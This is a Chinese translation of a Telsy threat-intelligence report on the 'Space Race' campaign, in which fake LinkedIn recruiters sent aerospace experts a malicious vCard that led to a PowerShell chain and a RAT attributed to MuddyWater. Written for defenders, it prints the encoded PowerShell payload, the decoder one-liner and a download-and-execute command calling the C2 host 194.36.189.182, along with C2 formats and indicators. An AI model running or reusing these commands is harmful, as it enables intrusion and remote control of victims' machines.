SPACE RACE攻击行动

  • A+
所属分类:安全文章
NO.1 【简介】



2020年5月初,Telsy分析了一些针对航空航天和航空电子领域的攻击活动,攻击者通过流行的职场社交网络LinkedIn对个人进行社会工程学攻击。根据Telsy研究人员的观测,该攻击行动,针对的是意大利的航空航天研究领域中具有高知名度的专家。

攻击者利用真实的LinkedIn虚拟身份,伪装成一家卫星图像公司的人力资源招聘人员,并通过私发消息与目标联系,邀请他们下载一个假的工作信息附件,而下载的文件实际上是包含一个vCard文件(VCF)和名为http文件夹的压缩包。

打开后,.vcf文件如下所示:

SPACE RACE攻击行动

如前所述,攻击者还加入了一些在卫星图像([email protected])和地理空间服务(BDLI)公司的相关资料,以获得受害者的信任。

其感染链非常复杂,由基于Powershell脚本和可执行文件的许多阶段组成,最终还植入了一个功能强大且以前没有发现的RAT(远程管理工具)。

根据其特定的目标、社会工程手段的准确性以及感染链的中等复杂性,Telsy认为这次攻击是由一个APT攻击组织发起的,该攻击组织对窃取航空航天领域的信息特别感兴趣。此外,基于被分析恶意软件代码的相似性,Telsy认为此次攻击事件,与Muddywater(又名Static Kitten或Mercury)攻击组织有关的可能性为中等。


NO.2 【攻击链分析】



VCF文件利用了去年的漏洞(ZDI-19-013,ZDI-CAN-6920),该漏洞允许在用户单击网站链接时执行本地文件。如上图所示,网站URL以“ http.\”开头,而不以“ http://”开头,使用此技巧,攻击者能够引用本地http文件夹(此文件夹是与VCF文件一起发送的,名为“http”的压缩包解压出的)中的可执行文件,并将其命名为www.bdli-portal.com。单击这个链接,将会启动整个感染链。

该可执行文件的哈希为:


类型

SHA256 d8eeebcd00405dc27bc4d97336df4f6e2826e68a9bedaebc6781856a8e792bad

该文件由Python语言开发,通过PyInstaller打包成可执行程序,它的功能是用来下载后续的恶意模块。

当单击VCF链接后触发可执行文件时,它将打开浏览器,指向URL http://185.183.96.11/page,让受害者以为真的点击了网站。

但是,在后台,该恶意软件在%PROGRAMDATA%文件夹中写入一个名为Windows的新文件,其中包含编码的Powershell脚本,如下所示:

1041191121011181071131120341020420381070430341251161031181191161120340420930851231171181031110480861031221180480711121011131021071121050950600600670850690750750480731031180851181161071121050420930851231171181031110480691131121201031161180950600600721161131110680991171030560540851181161071121050420381070480841031141100991011030420410420410460410990410430480841031141100991011030420410430410460411000410430480841031141100991011030420411250410460411010410430480841031141100991011030420411270410460411020410430480841031141100991011030420410930410460411030410430480841031141100991011030420410950410460411040410430430430430611270611071031220421020421020420410881240670510430740510700800880840420890711131230


该文件的内容使用以下脚本进行解码和执行,即使在这种情况下也由Python可执行文件触发:

$a=get-content c:programdatawindows; del c:programdatawindows; $t = ''; for($i=0;$i -lt $a.Length;$i+=3){$t += [char](([int]($a[$i..($i+2)] -join ''))-2)}; iex($t);


最后,我们得到一个类似于下面的代码:

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::TLS12;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $V=new-object net.webclient; $V.proxy=[Net.WebRequest]::GetSystemWebProxy(); $V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; $V.Headers.Add("Cookie","X-BackEndCookie=S-1-5-21-2578815479-2326696314-4113358997-2544"); $s=$V.DownloadString('https://194.36.189.182:443/Default.aspx');iex($s)


此代码从 https://194.36.189.182:443/Default.aspx下载一个Powershell脚本。经过执行一系列的Powershell代码后,最终下载和执行了一个名为“ chrome.exe”的可执行文件。

此文件的哈希为:


类型
SHA256 d39a3e2c2724c5e9c0861a94d46530259ea69c06dd40176636080b82b7f879a1


NO.3 【下载器分析】



 此恶意程序的静态信息如下:


名称

编译器
Microsoft Visual C++ 8
时间戳
Sun May 03 22:12:55 2020
文件大小
259072 (bytes)
内部名称
Chrome.exe


“ chrome.exe”文件旨在下载最终的植入程序,并在受害系统的上下文中保持持久性。该可执行文件使用自定义算法,解密出与命令和控制(CnC)服务器(37.120.146.73)通信的字符串。

命令和控制通信通过ws2_32.dll的connect、send和recvfunctions来执行。用于发送以下GET HTTP请求:

GET /policy/xxx HTTP/1.1 Host: 37.120.146.73 Content-Length: 0

HTTP GET请求用于下载名为“ Poul.exe”的文件,并将其存储到C: ProgramData Updates文件夹。

此样本的哈希如下:


类型

SHA256 fbce320f360bd107ffac0251a83702f5108e089c51cc85b26ea33c9c714e921b

最后,恶意软件自行执行WinExec函数。


NO.4 【植入程序分析】



该恶意程序的静态信息如下:

名称

编译器
Microsoft Visual C++ 8
时间戳
Sun May 03 21:48:27 2020
文件大小
335360 (bytes)
内部名称
Poul.exe


在这个可执行文件中,主要的代码是用来与命令和控制(Cnc)服务器通信的,这是之前上文提到的代码。

恶意软件通过收集用来被命令和控制(CnC)服务器识别的信息,来制作受害机器的指纹,从而使其能够接收随后执行的命令。

网络通信通过HTTP POST请求进行。下面是其通信的一个例子:

POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 37.120.146.73Content-Length: 170 id=ZnJhbmNlc2NvJjE5Mi4xNjguMi4xMjgmMDA6MEM6Mjk6RDQ6QkI6ODMmV29ya2dyb3Vw&page=192.168.2.128&valid=00:0C:29:D4:BB:83&name=user&search=Workgroup&sub=2020-05-08.14:33


请求主体包含以下字段:

  • Page =受感染机器的本地IP地址

  • Valid=受感染机器的MAC地址

  • Name =受害者的用户名

  • Search =受感染机器的工作组

  • Id =上面列出的字段的串接,使用base64编码


如果CnC服务器认为此类信息与攻击行动相关,则使用字符串“result”进行响应。否则,它将以字符串“ nothing”响应。这两个字符串似乎都是base64编码的。

如果植入程序获得了“nothing”字符串,它将进入一个不执行任何恶意操作的无限睡眠循环。否则,如果它接收到字符串“result”,它将执行另一个网络请求(类似于上面提到的),以便接收要执行的命令。


植入程序可以:

  • 通过cmd.exe执行攻击者给出的命令:


SPACE RACE攻击行动


  • 编写和修改受害者文件系统中的文件,将新创建的文件存储到%TEMP%目录中,如下所示:

SPACE RACE攻击行动


操作的结果通过后续HTTP POST请求发送,格式如下:

POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 37.120.146.73Content-Length: 170 id=ZnJhbmNlc2NvJjE5Mi4xNjguMi4xMjgmMDA6MEM6Mjk6RDQ6QkI6ODMmV29ya2dyb3Vw&type=01/02&form=result of the command

其中:

  • type = “ 01”表示结果属于命令执行。“ 02”表示修改/写入文件操作的结果。

  • form = 包含命令的结果

  • id = 与之前所述相同

命令和控制服务器发送字符串“okCli”作为响应,以表明请求已被正确接收和处理。


NO.5 【持久化】



如以下证据所示,“ Chrome.exe”可确保HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Explorer User Shell Folders注册表项下的持久性设置是指向路径C: ProgramData Updates Poul.exe。通过这种方式,后期植入程序将在任何系统登录/重启的时候启动。

SPACE RACE攻击行动


NO.6 【归因】



Telsy调查了一些代码和网络基础设施重叠的地方,发现了潜在的证据,表明这次行动背后的攻击组织可能是一个名为Muddywater(又名Static Kitten或Mercury)的组织。

实际上,在Telsy的研究活动中,已经提取并隔离出所分析组件和由社区链接到相关恶意软件之间的代码相似性。

具体来说,以下两个不同哈希的样本之间存在一些代码重叠

72f487068c704b6d636ddd87990e25ce8cd5940244e581063f4c54afa4438212(右侧)和

fbce320f360bd107ffac0251a83702f5108e089c51cc85b26ea33c9c714e921b(左侧)(分别在偏移量0x404243和0x401E36处)显示如下:

SPACE RACE攻击行动

此外,Telsy内部恶意软件归因引擎显示了,总共有5个可以关联到同一个攻击者的指标。

SPACE RACE攻击行动

此外,对网络基础设施的进一步调查发现网络与内部链接到同一攻击者的恶意IP地址(46.166.176.210)重叠,进而与域名“ corana.tk”重叠。

根据下图,Muddywater在以前的攻击中使用了该域名,在此攻击期间,该域名传递了ForeLord(又名DNSLord)植入程序。

SPACE RACE攻击行动

根据报告的证据,Telsy在中等可信度下将有关威胁活动归因于名为Muddywater(又名Static Kitten或Mercury)的APT攻击组织。


NO.7 【ATT&CK矩阵】



技术
策略
描述
T1194
访问 威胁组织使用社交媒体服务来传递恶意附件
T1204
执行
威胁组织依赖于用户的特定操作以获得执行
T1086
执行
威胁组织使用Powershell执行恶意脚本
T1202
防御规避
威胁组织可以在受害机器上执行命令
T1060
持久化
威胁组织在注册表或启动文件夹的“运行键”中添加一个条目,使用户登录时所引用的程序被执行
T1105

横向移动

命令和控制

威胁组织可以在操作过程中将文件从一个系统复制到另一个系统, 以便在操作过程中使用对手工具或其他文件
T1132
命令和控制
威胁组织使用标准数据编码系统传输命令和控制(C2)信息


NO.8 【威胁指标】



类型

SHA256 e742c9f2865d0c7439e402a12124bfe03a446b66224d81aeb0b7425e5498eddc
SHA256 d8eeebcd00405dc27bc4d97336df4f6e2826e68a9bedaebc6781856a8e792bad
SHA256 d39a3e2c2724c5e9c0861a94d46530259ea69c06dd40176636080b82b7f879a1
SHA256 fbce320f360bd107ffac0251a83702f5108e089c51cc85b26ea33c9c714e921b
IP
194.36.189.182
IP
37.120.146.73
URL
https://194.36.189.182:443/default.aspx
URL
http://37.120.146.73/policy/xxx


end



本文为CNTIC编译,不代表本公众号观点,转载请保留出处与链接。

联系信息进入公众号后点击“论坛信息”可见。


原文标题: Operation “Space Race”:Reaching the stars through professional Social Networks
原文地址:
https://www.telsy.com/wp-content/uploads/Operation_Space_Race.pdf
编译:CNTIC情报组


SPACE RACE攻击行动

本文始发于微信公众号(国家网络威胁情报共享开放平台):SPACE RACE攻击行动

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: